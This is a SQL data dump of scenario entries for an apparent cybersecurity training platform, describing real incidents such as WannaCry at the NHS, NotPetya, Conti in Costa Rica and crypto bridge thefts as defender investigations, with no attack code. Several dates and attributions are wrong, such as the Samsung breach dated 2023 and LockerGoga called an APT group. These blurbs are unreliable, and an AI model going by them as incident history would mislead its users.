(83, 'Operation Samsung Leak', 'Lapsus$', 'Intermediate-level scenario investigating Lapsus$ APT\'s theft of Samsung source code and extortion via Telegram.', 'In March 2023, the notorious APT group Lapsus$ executed a bold cyber heist, extracting 190GB of sensitive Samsung source code. This breach, targeting crucial Galaxy device components, sent shockwaves through the mobile security industry. Trainees must now dissect the attack\'s trajectory, unravel the Telegram-based extortion tactics, and assess the lasting impact on future security protocols.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Lapsus$\\\",\\\"Samsung breach\\\",\\\"cybersecurity training\\\",\\\"APT group\\\",\\\"mobile security\\\"]\"', '', 5, '2026-01-15 01:01:36', 'Lapsus$ APT: Samsung Source Code Breach Simulation', 'Intermediate-level scenario investigating Lapsus$ APT\'s theft of Samsung source code and extortion via Telegram.', 'operation-samsung-leak', 1),
(84, 'Operation Costa Rica', 'Conti', 'Investigate Conti\'s ransomware attack on Costa Rica, analyzing encryption tactics, ransom demands, and political messaging.', 'In April 2022, Costa Rica faced a national emergency when the notorious Conti group launched a ransomware attack on multiple government ministries. This operation will guide you through the investigation of how Conti encrypted critical systems, demanded a $20 million ransom, and issued politically charged messages, disrupting the nation\'s infrastructure.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Conti ransomware\\\",\\\"Costa Rica cyber attack\\\",\\\"APT group tactics\\\",\\\"ransomware investigation\\\",\\\"cybersecurity training\\\"]\"', '', 4, '2026-01-15 01:01:56', 'Conti Ransomware Attack on Costa Rica: A Cybersecurity Training Scenario', 'Investigate Conti\'s ransomware attack on Costa Rica, analyzing encryption tactics, ransom demands, and political messaging.', 'operation-costa-rica', 1),
(85, 'Operation WannaCry NHS', 'Lazarus Group', 'Investigate the WannaCry ransomware impact on NHS, focusing on unpatched systems, canceled surgeries, and kill-switch discovery.', 'In May 2017, the infamous Lazarus Group launched a global ransomware attack known as WannaCry, crippling over 80 NHS hospital trusts in the UK. This operation explores the devastating impact on healthcare services, highlighting the vulnerability of unpatched Windows XP systems, the chaos caused by canceled surgeries, and the serendipitous discovery of a kill-switch domain that halted further damage. Participants will delve into the intricacies of the attack, learning to identify and mitigate similar threats in the future.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"WannaCry\\\",\\\"Lazarus Group\\\",\\\"NHS Cyber Attack\\\",\\\"Ransomware\\\",\\\"Cybersecurity Training\\\"]\"', '', 6, '2026-01-15 01:02:19', 'Advanced Analysis of Lazarus Group\'s Impact on WannaCry NHS Attack', 'Investigate the WannaCry ransomware impact on NHS, focusing on unpatched systems, canceled surgeries, and kill-switch discovery.', 'operation-wannacry-nhs', 1),
(86, 'Operation City of Atlanta', 'SamSam (Iranian Hackers)', 'Expert scenario to dissect SamSam\'s ransomware attack on Atlanta, focusing on RDP brute-force and $51,000 ransom demand.', 'In March 2018, Atlanta\'s municipal services were brought to a standstill by a devastating ransomware attack orchestrated by the notorious Iranian hacker group, SamSam. The attack, which leveraged brute-force tactics to gain access via Remote Desktop Protocol (RDP), led to a ransom demand of $51,000. However, the true cost of recovery soared to an estimated $17 million. Participants are tasked with tracing the steps of this attack, from initial access to the eventual exfiltration, in a comprehensive cybersecurity investigation.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"SamSam ransomware\\\",\\\"Atlanta attack\\\",\\\"RDP brute-force\\\",\\\"cybersecurity training\\\",\\\"APT group\\\"]\"', '', 6, '2026-01-15 01:02:46', 'Cybersecurity Operation: Unraveling SamSam\'s Ransomware Attack on Atlanta', 'Expert scenario to dissect SamSam\'s ransomware attack on Atlanta, focusing on RDP brute-force and $51,000 ransom demand.', 'operation-city-of-atlanta', 1),
(87, 'Operation Baltimore', 'RobbinHood', 'Investigate and analyze the RobbinHood ransomware attack exploiting Baltimore\'s systems via a vulnerable remote access tool.', 'In early 2023, Baltimore\'s city systems were hit by a devastating ransomware attack perpetrated by the notorious APT group, RobbinHood. Over several months, key operations were hindered, causing widespread impact. The city made headlines with its controversial decision to refuse ransom payment, leaving systems crippled. Your mission is to delve into the intricacies of the attack, focusing on the exploitation of a vulnerable remote access tool, to piece together the attack chain and provide actionable insights.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"RobbinHood\\\",\\\"ransomware attack\\\",\\\"Baltimore city systems\\\",\\\"cybersecurity training\\\",\\\"APT group\\\"]\"', '', 5, '2026-01-17 03:36:38', 'RobbinHood Ransomware Attack on Baltimore City Systems', 'Investigate and analyze the RobbinHood ransomware attack exploiting Baltimore\'s systems via a vulnerable remote access tool.', 'operation-baltimore', 1),
(88, 'Operation Garmin Outage', 'Evil Corp (WastedLocker)', 'Investigate Evil Corp\'s WastedLocker ransomware attack on Garmin, analyze a $10 million ransom and aviation service disruption.', 'In this training scenario, participants will dive into the infamous WastedLocker ransomware attack orchestrated by Evil Corp that crippled Garmin\'s operations. The attack not only demanded a staggering $10 million ransom but also highlighted vulnerabilities in aviation services, raising significant concerns about sanctions evasion. Trainees will follow the digital breadcrumbs left by the attackers, piecing together the sophisticated tactics, techniques, and procedures that led to one of the most notable cyber incidents of recent times.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Evil Corp\\\",\\\"WastedLocker\\\",\\\"ransomware\\\",\\\"Garmin attack\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-01-17 03:37:30', 'Evil Corp WastedLocker Attack Simulation on Garmin', 'Investigate Evil Corp\'s WastedLocker ransomware attack on Garmin, analyze a $10 million ransom and aviation service disruption.', 'operation-garmin-outage', 1),
(89, 'Operation Norsk Hydro', 'LockerGoga', 'Advanced training on investigating LockerGoga\'s ransomware impact on aluminum giant, focusing on backup restoration and manual operations.', 'In early 2019, a major aluminum manufacturing giant faced a severe ransomware attack by the notorious APT group, LockerGoga. The company, refusing to succumb to demands, decided to restore from backups, incurring a significant $75 million impact. This operation simulation takes you through the stages of the attack, the strategic decision to switch to manual operations, and the subsequent investigation into the incident.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"LockerGoga\\\",\\\"ransomware\\\",\\\"cybersecurity\\\",\\\"APT\\\",\\\"backup restoration\\\"]\"', '', 6, '2026-01-17 03:38:07', 'LockerGoga Ransomware Attack Simulation on Aluminum Manufacturing', 'Advanced training on investigating LockerGoga\'s ransomware impact on aluminum giant, focusing on backup restoration and manual operations.', 'operation-norsk-hydro', 1),
(90, 'Operation Maersk NotPetya', 'Sandworm', 'Explore Maersk\'s recovery from the $300M NotPetya attack with analysis of IT rebuild and strategic incident response.', 'In 2017, the world witnessed one of the most devastating cyberattacks in history when the NotPetya malware struck, inflicting over $10 billion in damages globally. Among its victims was Maersk, the world\'s largest shipping company, whose operations ground to a halt, resulting in a $300 million impact. This training scenario dives into the intricate investigation of the attack, focusing on the complete IT infrastructure rebuild, the serendipitous discovery of a functional domain controller in Ghana, and the relentless 10-day recovery effort.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"NotPetya\\\",\\\"cyberattack recovery\\\",\\\"Maersk\\\",\\\"cybersecurity training\\\",\\\"Sandworm APT\\\"]\"', '', 3, '2026-01-17 03:39:02', 'NotPetya Aftermath: Rebuilding Maersk\'s IT Infrastructure', 'Explore Maersk\'s recovery from the $300M NotPetya attack with analysis of IT rebuild and strategic incident response.', 'operation-maersk-notpetya', 1),
(91, 'Operation Merck Disruption', 'Sandworm (NotPetya)', 'Investigate the $1.4B NotPetya impact on pharmaceuticals and the cyber insurance \'act of war\' legal battle.', 'In the wake of the infamous NotPetya attack, the pharmaceutical industry faced unprecedented challenges. Operations worth $1.4 billion were disrupted, particularly affecting vaccine production. As Sandworm\'s malicious campaign unfolded, questions arose about the adequacy of cyber insurance coverage, sparking a landmark legal battle over \'act of war\' exclusions. In this expert-level training scenario, participants will delve into the intricate details of Sandworm\'s tactics and the ensuing fallout.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"NotPetya\\\",\\\"Sandworm\\\",\\\"Cyber Insurance\\\",\\\"Pharmaceutical Cybersecurity\\\",\\\"APT Training\\\"]\"', '', 7, '2026-01-17 03:40:33', 'Expert Cybersecurity Training: Analyzing NotPetya\'s Impact on Pharma', 'Investigate the $1.4B NotPetya impact on pharmaceuticals and the cyber insurance \'act of war\' legal battle.', 'operation-merck-disruption', 1),
(92, 'Operation FedEx TNT', 'Sandworm (NotPetya)', 'Explore the $400M NotPetya impact on FedEx\'s TNT Express. Analyze data loss and integration challenges in this intermediate training scenario.', 'In 2017, the notorious APT group Sandworm unleashed the NotPetya cyberattack, which rippled across the globe, causing billions in damage. Among its victims was FedEx\'s TNT Express, suffering a staggering $400 million impact. Trainees will dive into the depths of this attack, exploring the permanent data loss in legacy systems and the integration challenges that magnified the damage. As you investigate, you\'ll uncover the motives, methods, and missteps that defined this cataclysmic event.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"NotPetya\\\",\\\"Sandworm\\\",\\\"FedEx\\\",\\\"Cybersecurity Training\\\",\\\"APT Group\\\"]\"', '', 5, '2026-01-17 03:41:03', 'NotPetya Impact Analysis on FedEx\'s TNT Express: A Cyber Operation Case Study', 'Explore the $400M NotPetya impact on FedEx\'s TNT Express. Analyze data loss and integration challenges in this intermediate training scenario.', 'operation-fedex-tnt', 1),
(93, 'Operation Ronin Bridge', 'Lazarus Group', 'Investigate the Ronin Bridge hack, uncover compromised keys, and follow blockchain forensics in this beginner-level cyber operation.', 'In March 2022, the Ronin Bridge network suffered a staggering $625 million cryptocurrency theft, marking it as the largest crypto hack in history. At the heart of this operation is the notorious Lazarus Group, a North Korean cybercrime syndicate known for its sophisticated financial heists. As a budding cyber threat intelligence analyst, you are tasked with piecing together how this attack unfolded, tracking the compromised validator keys, and following the complex trail of stolen funds through blockchain forensics.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Ronin Bridge hack\\\",\\\"Lazarus Group\\\",\\\"cryptocurrency theft\\\",\\\"cybersecurity training\\\",\\\"blockchain forensics\\\"]\"', '', 5, '2026-01-17 03:41:32', 'Lazarus Group\'s Ronin Bridge Cryptocurrency Heist Investigation', 'Investigate the Ronin Bridge hack, uncover compromised keys, and follow blockchain forensics in this beginner-level cyber operation.', 'operation-ronin-bridge', 1),
(94, 'Operation Harmony Bridge', 'Lazarus Group', 'Investigate the Harmony Protocol bridge heist by Lazarus Group, focusing on compromised multi-sig schemes and crypto laundering.', 'In the heart of the cryptocurrency realm, a staggering $100 million has vanished from Harmony Protocol\'s bridge. The infamous Lazarus Group is suspected, leveraging its expertise in financial theft to crack the multi-sig scheme. Analysts must dive into the remnants of this cyber theft, unraveling the threads of a North Korean cryptocurrency laundering operation.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Lazarus Group\\\",\\\"Harmony Protocol\\\",\\\"cryptocurrency theft\\\",\\\"APT investigation\\\",\\\"cybersecurity training\\\"]\"', '', 3, '2026-01-17 03:44:07', 'Lazarus Group\'s $100M Crypto Heist Investigation', 'Investigate the Harmony Protocol bridge heist by Lazarus Group, focusing on compromised multi-sig schemes and crypto laundering.', 'operation-harmony-bridge', 1),
(95, 'Operation Wormhole Bridge', 'Unknown', 'Investigate the $325 million theft via a signature verification flaw in Wormhole\'s smart contract and the unusual $10M bug bounty offer.', 'In the early hours of a cold Tuesday morning, chaos erupted in the blockchain community as reports emerged of a massive $325 million theft from the Wormhole bridge. The cyber heist, executed by an unidentified APT group, exploited a critical vulnerability in the smart contract’s signature verification process. Surprisingly, a $10 million bug bounty was offered to the attacker. Your mission: dissect the smart contract exploitation and unravel the mystery behind the bounty offer, tracing the steps of this audacious cyber operation.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"cybersecurity training\\\",\\\"smart contract exploitation\\\",\\\"blockchain security\\\",\\\"APT investigation\\\",\\\"signature verification\\\"]\"', '', 4, '2026-01-17 03:44:35', 'Wormhole Bridge Heist: Analyzing Smart Contract Exploitation', 'Investigate the $325 million theft via a signature verification flaw in Wormhole\'s smart contract and the unusual $10M bug bounty offer.', 'operation-wormhole-bridge', 1),
(96, 'Operation Poly Network', 'Unknown (White Hat?)', 'Analyze a $610 million DeFi hack with an unknown attacker who returned the funds, highlighting cross-chain vulnerabilities.', 'In a baffling twist of finance and ethics, a mysterious attacker siphoned off $610 million from a leading DeFi platform, only to return the funds days later. This advanced training scenario dives into the complexities of cross-chain vulnerabilities, exploring the enigmatic dialogue between the hacker and the victim platform. Trainees will step into the shoes of cybersecurity investigators tasked with dissecting this unprecedented event.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"DeFi hack\\\",\\\"cross-chain vulnerability\\\",\\\"cybersecurity training\\\",\\\"crypto investigation\\\",\\\"ethical hacking\\\"]\"', '', 6, '2026-01-17 03:46:27', 'The $610 Million DeFi Mystery: Unraveling the Cross-Chain Exploit', 'Analyze a $610 million DeFi hack with an unknown attacker who returned the funds, highlighting cross-chain vulnerabilities.', 'operation-poly-network', 1),
(97, 'T-Mobile Breach', 'John Binns (Individual)', 'Investigate the T-Mobile breach by John Binns exposing 54M records via router exploitation.', 'In 2021, a lone threat actor known as John Binns breached T-Mobile\'s defenses, exposing the data of 54 million customers. This training scenario challenges participants to dissect the breach, unravel the attacker\'s methods, and understand the intricate dance between exploitation and data exfiltration. Participants will navigate through public taunts and data sales in the shadowy corners of the internet.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"T-Mobile breach\\\",\\\"cybersecurity training\\\",\\\"John Binns\\\",\\\"data exfiltration\\\",\\\"APT investigation\\\"]\"', '', 5, '2026-01-17 03:47:33', 'John Binns\' T-Mobile Breach Investigation Training', 'Investigate the T-Mobile breach by John Binns exposing 54M records via router exploitation.', 't-mobile-breach', 1);
INSERT INTO `operations` (`id`, `title`, `apt_group`, `description`, `story_intro`, `difficulty_level`, `display_order`, `is_active`, `is_premium`, `passing_grade`, `time_limit_hours`, `tags`, `scenario_prompt`, `total_alerts`, `created_at`, `seo_title`, `seo_description`, `slug`, `min_level`) VALUES
(98, 'Operation Yahoo Breach', 'FSB Officers / Criminal Hackers', 'Analyze the techniques behind the Yahoo breach affecting 3 billion accounts, focusing on forged cookies and state-sponsored threats.', 'In 2013, Yahoo experienced a massive data breach, compromising 3 billion accounts. This operation delves into the sophisticated tactics used by FSB officers and criminal hackers. Participants will investigate the creation of forged cookies that bypass passwords and the strategic targeting of journalists, unraveling the layers of one of history\'s largest cyber-attacks.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Yahoo breach\\\",\\\"forged cookies\\\",\\\"state-sponsored hacking\\\",\\\"FSB\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-01-17 03:49:21', 'Unraveling the Yahoo Data Breach: A Deep Dive', 'Analyze the techniques behind the Yahoo breach affecting 3 billion accounts, focusing on forged cookies and state-sponsored threats.', 'operation-yahoo-breach', 1),
(99, 'Operation LinkedIn Scrape', 'Data Brokers', 'Learn to analyze API abuse in a scenario where 700 million LinkedIn profiles were scraped by the Data Brokers APT group.', 'In this training scenario, participants will dive into the world of cyber threats targeting social media platforms. The Data Brokers, a notorious APT group, have executed a massive scraping operation, collecting 700 million LinkedIn profiles. Trainees will explore API abuse, differentiate between data scraping and breaches, and understand the risks associated with aggregating public data.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"API abuse\\\",\\\"Data scraping\\\",\\\"LinkedIn breach\\\",\\\"Data aggregation\\\",\\\"Cybersecurity training\\\"]\"', '', 5, '2026-01-17 03:49:46', 'Investigating LinkedIn Profile Scraping by Data Brokers', 'Learn to analyze API abuse in a scenario where 700 million LinkedIn profiles were scraped by the Data Brokers APT group.', 'operation-linkedin-scrape', 1),
(104, 'Operation GoDaddy Breach', 'Unknown (Social Engineering)', 'Explore the GoDaddy breach affecting 1.2M users via social engineering tactics and credential theft.', 'In a sprawling cyber operation, an unknown APT group has targeted GoDaddy\'s WordPress customers over several years. This training scenario delves into the tactics used, including social engineering, credential compromises, and sensitive data theft. Participants will uncover how attackers gained access, maintained their presence, and exfiltrated critical information.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"GoDaddy breach\\\",\\\"WordPress security\\\",\\\"cybersecurity training\\\",\\\"credential theft\\\",\\\"social engineering\\\"]\"', '', 5, '2026-01-24 00:36:52', 'Beginner Cybersecurity Training: GoDaddy WordPress Breach Investigation', 'Explore the GoDaddy breach affecting 1.2M users via social engineering tactics and credential theft.', 'operation-godaddy-breach', 1),
(102, 'Operation Facebook Leak', 'Unknown', 'Analyze the breach of 533 million Facebook users\' data via a long-exploited vulnerability.', 'In early 2021, security researchers uncovered a massive leak involving the personal data of 533 million Facebook users. The data, exposed through a vulnerability in Facebook\'s contact importer feature, had been accessible for years before it was publicly disclosed. In this advanced training scenario, you will investigate the exploitation of this vulnerability, piece together the timeline of events, and analyze the threat actor\'s techniques, tactics, and procedures.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Facebook data breach\\\",\\\"cybersecurity training\\\",\\\"contact importer vulnerability\\\",\\\"APT investigation\\\"]\"', '', 5, '2026-01-24 00:09:12', 'Investigating the Facebook Data Breach: Unveiling the Contact Importer Vulnerability', 'Analyze the breach of 533 million Facebook users\' data via a long-exploited vulnerability.', 'operation-facebook-leak', 1),
(103, 'Operation Twitch Leak', 'Anonymous (4chan)', 'Expert-level analysis of the Twitch leak by Anonymous (4chan), exploring server misconfiguration and competitive risks.', 'In a shocking cyber event, the complete Twitch source code, including sensitive streamer earnings data, has been leaked by Anonymous (4chan). This 125GB data dump, attributed to a misconfigured server exposure, poses severe competitive intelligence risks. As a senior analyst, your mission is to meticulously investigate this breach, identify the weak points, and provide insights into mitigating future threats.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Twitch leak\\\",\\\"Anonymous 4chan\\\",\\\"cybersecurity training\\\",\\\"APT investigation\\\",\\\"competitive intelligence\\\"]\"', '', 5, '2026-01-24 00:32:33', 'Advanced Investigation of Twitch Source Code and Earnings Breach', 'Expert-level analysis of the Twitch leak by Anonymous (4chan), exploring server misconfiguration and competitive risks.', 'operation-twitch-leak', 1),
(105, 'Operation Microsoft Email Servers', 'Hafnium (ProxyLogon)', 'Investigate Hafnium\'s mass exploitation of Exchange servers using ProxyLogon vulnerabilities.', 'In early 2021, the world faced a massive cyber onslaught as Hafnium, a sophisticated APT group, exploited a series of zero-day vulnerabilities in Microsoft Exchange servers. With over 250,000 instances affected globally, organizations scrambled to patch their systems before the access was weaponized by ransomware operators. Trainees will dive into the intricate attack chain, from initial access to potential data exfiltration, and develop skills to counter such threats.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Hafnium\\\",\\\"ProxyLogon\\\",\\\"Exchange Server\\\",\\\"Cybersecurity Training\\\",\\\"Zero-day Vulnerabilities\\\"]\"', '', 3, '2026-01-24 03:31:55', 'Hafnium ProxyLogon Exploit Response Training', 'Investigate Hafnium\'s mass exploitation of Exchange servers using ProxyLogon vulnerabilities.', 'operation-microsoft-email-servers', 1),
(106, 'Operation Pegasus', 'NSO Group (Commercial Spyware)', 'Learn how to detect Pegasus spyware using zero-click iMessage exploits targeting journalists and more.', 'In this training scenario, you will dive into a complex investigation involving the notorious Pegasus spyware. Developed by the NSO Group, this commercial spyware has been used to target journalists, activists, and even heads of state. Your mission is to follow the trail of zero-click iMessage exploits, understand the FORCEDENTRY vulnerability, and identify forensic indicators on infected iOS devices. As a beginner, you\'ll explore each step of the attack chain, gaining valuable skills in identifying and mitigating these sophisticated threats.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Pegasus Spyware\\\",\\\"NSO Group\\\",\\\"iMessage Exploit\\\",\\\"FORCEDENTRY\\\",\\\"Cybersecurity Training\\\"]\"', '', 4, '2026-01-24 03:32:31', 'Beginner\'s Guide to Identifying Pegasus Spyware Activities', 'Learn how to detect Pegasus spyware using zero-click iMessage exploits targeting journalists and more.', 'operation-pegasus', 1),
(107, 'Operation APT1 Mandiant', 'APT1 (PLA Unit 61398)', 'Investigate APT1\'s cyber espionage tactics, analyzing their Shanghai-based operations and theft from over 141 organizations.', 'In a groundbreaking investigation, cybersecurity experts have traced a series of sophisticated cyber espionage activities back to APT1, a notorious Chinese military hacking group. Known for their relentless targeting of intellectual property across diverse industries, this operation unveils the intricate tactics of the \'Comment Crew\' and their Shanghai-based digital infrastructure. Trainees must navigate through the cyber labyrinth to understand and counteract the threat posed by these skilled adversaries.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"APT1\\\",\\\"cyber espionage\\\",\\\"Comment Crew\\\",\\\"intellectual property theft\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-01-24 03:34:20', 'Operation Comment Crew: Unmasking APT1\'s Cyber Espionage', 'Investigate APT1\'s cyber espionage tactics, analyzing their Shanghai-based operations and theft from over 141 organizations.', 'operation-apt1-mandiant', 1),
(108, 'Operation Regin', 'Five Eyes (GCHQ/NSA)', 'Uncover the intricate layers of a sophisticated modular malware used by Five Eyes APT for intelligence gathering.', 'In the heart of an international cyber espionage campaign, operatives from Five Eyes have deployed a modular malware platform targeting GSM base stations. This operation calls for a deep investigation into its encrypted virtual file system and multi-stage loading architecture. Analysts must unravel the complexity of this threat to protect critical communications infrastructure.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Five Eyes APT\\\",\\\"modular malware\\\",\\\"GSM targeting\\\",\\\"cyber espionage\\\",\\\"threat analysis\\\"]\"', '', 5, '2026-01-24 03:34:45', 'Five Eyes Modular Malware Investigation', 'Uncover the intricate layers of a sophisticated modular malware used by Five Eyes APT for intelligence gathering.', 'operation-regin', 1),
(109, 'Operation Duqu', 'Equation Group (Tilded Platform)', 'Analyze Stuxnet-related malware targeting ICS vendors, focusing on code lineage and intelligence gathering.', 'In this advanced training scenario, participants will delve into the intricate world of cyber espionage orchestrated by the notorious Equation Group. The mission involves dissecting a sophisticated reconnaissance malware linked to Stuxnet, targeting industrial control system vendors. As the team investigates, they will uncover shared code lineage, strategic intelligence gathering, and potential preparation for future attacks. The operation challenges participants to think like advanced threat actors and build a robust defense strategy.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Equation Group\\\",\\\"Stuxnet\\\",\\\"Industrial Control Systems\\\",\\\"Cyber Espionage\\\",\\\"Advanced Threats\\\"]\"', '', 5, '2026-01-24 03:35:12', 'Advanced Reconnaissance with Equation Group Tactics', 'Analyze Stuxnet-related malware targeting ICS vendors, focusing on code lineage and intelligence gathering.', 'operation-duqu', 1),
(110, 'Operation Careto', 'The Mask (Spanish-speaking APT)', 'Investigate The Mask\'s espionage targeting governments with Careto malware intercepting communications.', 'In a world where information is power, The Mask, a Spanish-speaking APT group, has launched a sophisticated espionage campaign. Their custom malware, Careto, is designed to intercept and manipulate communication channels within government institutions, diplomatic entities, and energy companies. As a senior analyst, you are tasked with uncovering their tactics, techniques, and procedures to protect critical infrastructures.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"The Mask APT\\\",\\\"Careto malware\\\",\\\"cyber espionage\\\",\\\"government security\\\",\\\"APT attack\\\"]\"', '', 5, '2026-01-24 03:39:29', 'Expert Espionage Analysis: Uncover The Mask\'s Careto Campaign', 'Investigate The Mask\'s espionage targeting governments with Careto malware intercepting communications.', 'operation-careto', 1),
(111, 'Operation Machete', 'Machete (Latin American APT)', 'Investigate Machete\'s espionage campaign targeting military and government in Venezuela, Ecuador, Colombia.', 'In recent months, the Machete APT group has been orchestrating a sophisticated espionage campaign targeted at military and government entities across Venezuela, Ecuador, and Colombia. Leveraging social engineering techniques, they deploy custom Python-based Remote Access Trojans (RATs) to infiltrate sensitive networks. Your task is to analyze their tactics and understand how these attacks unfold, from initial access to data exfiltration.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Machete APT\\\",\\\"Espionage\\\",\\\"Cybersecurity Training\\\",\\\"Latin America\\\",\\\"Python RATs\\\"]\"', '', 5, '2026-01-24 03:39:54', 'Operation Machete: Espionage in Latin America', 'Investigate Machete\'s espionage campaign targeting military and government in Venezuela, Ecuador, Colombia.', 'operation-machete', 1),
(112, 'Operation Poseidon', 'Poseidon Group', 'Explore Poseidon Group\'s tactics in extortion-driven attacks on banks, focusing on data leaks.', 'Welcome to the Poseidon Group threat simulation. In this scenario, you\'ll dive into the shadowy operations of a Brazilian-Portuguese speaking cybermercenary group targeting financial institutions. As a novice analyst, you will unravel their tactics, techniques, and procedures, tracing their path from initial breach to the brink of data extortion. Your mission is to thwart their plans and safeguard sensitive financial data.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Poseidon Group\\\",\\\"cybersecurity training\\\",\\\"financial institutions\\\",\\\"data extortion\\\",\\\"APT\\\"]\"', '', 3, '2026-01-25 19:59:15', 'Poseidon Group Threat Simulation: Financial Institution Breach', 'Explore Poseidon Group\'s tactics in extortion-driven attacks on banks, focusing on data leaks.', 'operation-poseidon', 1),
(113, 'Operation Carbanak 2.0', 'FIN7 (Carbanak)', 'Uncover FIN7\'s shift from bank theft to point-of-sale system attacks using legitimate tools.', 'In the evolving landscape of cyber threats, the notorious APT group FIN7, also known as Carbanak, has adapted its tactics. Previously infamous for direct bank heists, FIN7 is now targeting point-of-sale (POS) systems across retail sectors. Leveraging legitimate penetration testing tools for illicit purposes, this operation requires analysts to trace the evolution of the malware and adapt their defensive strategies. Participants will investigate a series of alerts that reveal FIN7\'s cunning shift in tactics.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"FIN7\\\",\\\"Carbanak\\\",\\\"bank malware\\\",\\\"point-of-sale\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-01-28 00:03:11', 'FIN7\'s New Threat: From Banks to Point-of-Sale Systems', 'Uncover FIN7\'s shift from bank theft to point-of-sale system attacks using legitimate tools.', 'operation-carbanak-2-0', 1),
(114, 'Operation Silence', 'Silence Group', 'Investigate and neutralize Silence Group\'s ATM malware targeting Eastern European banks.', 'In the heart of Eastern Europe, a notorious Russian-speaking APT group, known as Silence Group, has been meticulously planning its next strike against financial institutions. Their objective: to compromise bank networks and gain control over ATMs. Your mission is to unravel their tactics, techniques, and procedures, focusing on their sophisticated reconnaissance and malware deployment phases.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Silence Group\\\",\\\"ATM malware\\\",\\\"Eastern Europe banks\\\",\\\"cybersecurity training\\\",\\\"APT threats\\\"]\"', '', 5, '2026-01-28 00:06:40', 'Advanced Threat Detection: Silence Group\'s ATM Malware Attack', 'Investigate and neutralize Silence Group\'s ATM malware targeting Eastern European banks.', 'operation-silence', 1),
(115, 'Operation Cobalt Gypsy', 'APT35 (Cobalt Gypsy)', 'Investigate APT35\'s cybersecurity operations targeting aerospace and telecom with Magic Hound malware.', 'In a climate of escalating international tensions, your cybersecurity team is tasked to investigate a sophisticated Iranian cyber-espionage campaign led by the notorious APT35 group, also known as Cobalt Gypsy. The operation focuses on their use of the \'Magic Hound\' malware, leveraging legitimate cloud services for command and control to infiltrate and extract sensitive data from aerospace and telecommunications sectors. Engage in this high-stakes scenario where expert skills are needed to unravel their methods and thwart their objectives.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"APT35\\\",\\\"Magic Hound\\\",\\\"cyber-espionage\\\",\\\"aerospace security\\\",\\\"telecommunications threat\\\"]\"', '', 5, '2026-01-28 00:07:19', 'Advanced Iranian Cyber-Espionage Simulation: APT35\'s Magic Hound Tactics', 'Investigate APT35\'s cybersecurity operations targeting aerospace and telecom with Magic Hound malware.', 'operation-cobalt-gypsy', 1),
(116, 'Operation Leafminer', 'Leafminer (Iranian APT)', 'Investigate Leafminer\'s espionage activities in the Middle East using Dropbox C2 and Total Commander RAT.', 'In the ever-evolving landscape of cyber threats, the Leafminer APT group has emerged as a formidable adversary. This Iranian group has launched a sophisticated espionage campaign targeting government and business entities across the Middle East. Leveraging Dropbox-based command and control (C2) infrastructure and exploiting the Total Commander remote access tool, Leafminer aims to infiltrate, persist, and exfiltrate sensitive information. Your mission is to unravel their tactics and mitigate the threat.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Leafminer APT\\\",\\\"Dropbox C2\\\",\\\"Total Commander RAT\\\",\\\"Middle East Espionage\\\",\\\"Cybersecurity Training\\\"]\"', '', 5, '2026-02-01 13:56:00', 'Leafminer Espionage Investigation: Dropbox C2 and Remote Access Exploitation', 'Investigate Leafminer\'s espionage activities in the Middle East using Dropbox C2 and Total Commander RAT.', 'operation-leafminer', 1),
(117, 'Operation Thamar Reservoir', 'APT35 (Charming Kitten)', 'Investigate APT35\'s targeted campaign against Israeli academics using fake conference lures for credential harvesting.', 'In this training scenario, you will step into the shoes of a cybersecurity analyst tasked with investigating a sophisticated spear-phishing campaign orchestrated by APT35, also known as Charming Kitten. This Iranian-linked group has launched a deceptive operation targeting Israeli academics and defense officials. Utilizing fake conference invitations, they aim to harvest credentials and infiltrate sensitive networks. Your mission is to unravel the layers of this operation and protect critical assets from being compromised.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"APT35\\\",\\\"Charming Kitten\\\",\\\"Credential Harvesting\\\",\\\"Cyber Threat Intelligence\\\",\\\"Cybersecurity Training\\\"]\"', '', 4, '2026-02-01 13:56:29', 'Charming Kitten\'s Deceptive Invitations: A Cyber Threat Analysis', 'Investigate APT35\'s targeted campaign against Israeli academics using fake conference lures for credential harvesting.', 'operation-thamar-reservoir', 1),
